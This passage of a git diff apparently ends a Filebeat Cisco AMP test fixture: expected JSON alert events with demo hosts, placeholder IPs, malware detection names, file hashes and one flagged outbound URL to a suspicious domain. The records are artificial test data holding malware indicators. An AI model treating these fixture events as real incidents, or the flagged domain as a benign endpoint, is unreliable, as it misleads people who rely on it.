"Demo_Dyre", + "input.type": "log", + "log.offset": 300181, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:10:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667055705522187", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 565000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667055705522000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 301500, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:10:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "b2:4b:d5:c2:a6:9f" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "ZBot:FakeAlert-tpd", + "cisco.amp.detection_id": "5832268410590855181", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Unknown", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "b2:4b:d5:c2:a6:9f" + ], + "cisco.amp.timestamp_nanoseconds": 13000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 5832268414885822000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e74f1b3fffc4ae61e077bbdec3230e95", + "file.hash.sha1": "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5", + "file.hash.sha256": "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", + "file.name": "2_3756858138.exe", + "file.path": "\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3756858138.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Zbot", + "host.name": "Demo_Zbot", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 302825, + "process.hash.md5": "9a2e18cb348feb772d02fb8f8728ab82", + "process.hash.sha1": "5df10f3387f7ff512e420240f81bde68a2b4c7aa", + "process.hash.sha256": "0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f", + "process.name": "a.exe", + "process.pid": 3020, + "related.hash": [ + "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", + "e74f1b3fffc4ae61e077bbdec3230e95", + "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5" + ], + "related.hosts": [ + "Demo_Zbot" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:10:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "b2:4b:d5:c2:a6:9f" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "ZBot:FakeAlert-tpd", + "cisco.amp.detection_id": "5832268410590855180", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Unknown", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "b2:4b:d5:c2:a6:9f" + ], + "cisco.amp.timestamp_nanoseconds": 810000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 5832268410590855000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e74f1b3fffc4ae61e077bbdec3230e95", + "file.hash.sha1": "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5", + "file.hash.sha256": "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", + "file.name": "2_3756858138.exe", + "file.path": "\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Zbot", + "host.name": "Demo_Zbot", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 304431, + "process.hash.md5": "9a2e18cb348feb772d02fb8f8728ab82", + "process.hash.sha1": "5df10f3387f7ff512e420240f81bde68a2b4c7aa", + "process.hash.sha256": "0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f", + "process.name": "a.exe", + "process.pid": 3020, + "related.hash": [ + "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", + "e74f1b3fffc4ae61e077bbdec3230e95", + "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5" + ], + "related.hosts": [ + "Demo_Zbot" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257087266357305", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 942000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257087266357000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 307596, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533666798007484426", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 469000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533666798007484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 308915, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533666793712517128", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 948000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533666793712517000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 311551, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:48.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533666785122582535", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 372000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533666785122583000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 312869, + "process.hash.md5": "51138beea3e2c21ec44d0932c71762a8", + "process.hash.sha1": "8939cf35447b22dd2c6e6f443446acc1bf986d58", + "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", + "process.name": "rundll32.exe", + "process.pid": 596, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:42.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257040021717048", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 304000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257040021717000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 314451, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176256988482109495", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 292000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176256988482109000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 315770, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533666703518203910", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 782000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533666703518204000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 317089, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:27.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533666694928269316", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 80000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533666694928269000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 319725, + "process.hash.md5": "51138beea3e2c21ec44d0932c71762a8", + "process.hash.sha1": "8939cf35447b22dd2c6e6f443446acc1bf986d58", + "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", + "process.name": "rundll32.exe", + "process.pid": 2204, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:24.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176256962712305718", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 286000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176256962712306000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 321307, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:07.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "c6:4e:72:6f:69:14" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Eldorado:Alureon-tpd", + "cisco.amp.detection_id": "5825617250006073346", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "c6:4e:72:6f:69:14" + ], + "cisco.amp.timestamp_nanoseconds": 296000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 5825617250006073000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "4a052246c5551e83d2d55f80e72f03eb", + "file.hash.sha1": "bc29f1e8460915596e1dcafd0c92d6309457d149", + "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "file.name": "tdss.exe", + "file.path": "\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TDSS", + "host.name": "Demo_TDSS", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 322626, + "process.hash.md5": "12896823fb95bfb3dc9b46bcaedc9923", + "process.hash.sha1": "9d2bf84874abc5b6e9a2744b7865c193c08d362f", + "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", + "process.name": "explorer.exe", + "process.pid": 1892, + "related.hash": [ + "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "4a052246c5551e83d2d55f80e72f03eb", + "bc29f1e8460915596e1dcafd0c92d6309457d149" + ], + "related.hosts": [ + "Demo_TDSS" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:09:02.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "5a:ff:4a:a3:8a:2f" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "5826709511729053698", + "cisco.amp.event_type_id": 1090519084, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", + "cisco.amp.related.mac": [ + "5a:ff:4a:a3:8a:2f" + ], + "cisco.amp.timestamp_nanoseconds": 706000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 80, + "event.action": "DFC Threat Detected", + "event.dataset": "cisco.amp", + "event.id": 5826709511729054000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "fileset.name": "amp", + "host.hostname": "Demo_Tinba", + "host.name": "Demo_Tinba", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 324228, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "12896823fb95bfb3dc9b46bcaedc9923", + "process.hash.sha1": "9d2bf84874abc5b6e9a2744b7865c193c08d362f", + "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", + "process.name": "Explorer.EXE", + "process.pid": 1600, + "related.hosts": [ + "Demo_Tinba" + ], + "related.ip": [ + "10.10.0.0", + "8.8.4.4", + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 1083, + "tags": [ + "cisco-amp", + "forwarded" + ], + "url.domain": "dak1otavola1ndos.com", + "url.extension": "php", + "url.original": "http://dak1otavola1ndos.com/h/index.php", + "url.path": "/h/index.php", + "url.scheme": "http" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/fields.go b/x-pack/filebeat/module/cisco/fields.go index de57daee50fe..4d465edfa975 100644 --- a/x-pack/filebeat/module/cisco/fields.go +++ b/x-pack/filebeat/module/cisco/fields.go @@ -19,5 +19,5 